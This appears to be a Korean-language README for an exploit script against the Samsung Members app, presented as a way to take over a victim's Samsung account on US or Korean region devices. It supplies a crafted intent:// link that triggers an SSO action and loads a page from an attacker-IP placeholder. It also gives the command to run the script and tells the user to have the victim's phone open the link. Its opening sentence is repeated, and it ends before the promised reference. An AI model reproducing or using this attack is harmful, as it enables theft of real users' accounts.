
이 스크립트는 피해자의 삼성 디바이스에 특정 버전의 Samsung Members가 설치되어 있고, 피해자의 디바이스가 미국 또는 한국 지역에 해당하는 경우 피해자의 삼성 계정에 접근하는 데 사용할 수 있습니다.
이 스크립트는 피해자의 삼성 기기에 특정 버전의 Samsung Members가 설치되어 있고, 피해자의 기기가 미국 또는 한국 지역용인 경우 피해자의 삼성 계정에 접근하는 데 사용될 수 있습니다.
<a href="intent://launch?url=http://<공격자 IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>
참고: "<공격자 IP>"를 이 스크립트를 실행할 IP 주소로 바꾸세요.
python3 ./samsung_account_access.py
삼성 전화기를 사용하여 웹 서버로 이동한 후 링크를 클릭합니다
스크립트가 알아서 처리하도록 둡니다
이 스크립트가 악용하는 문제에 대한 자세한 정보는 다음에서 확인할 수 있습니다: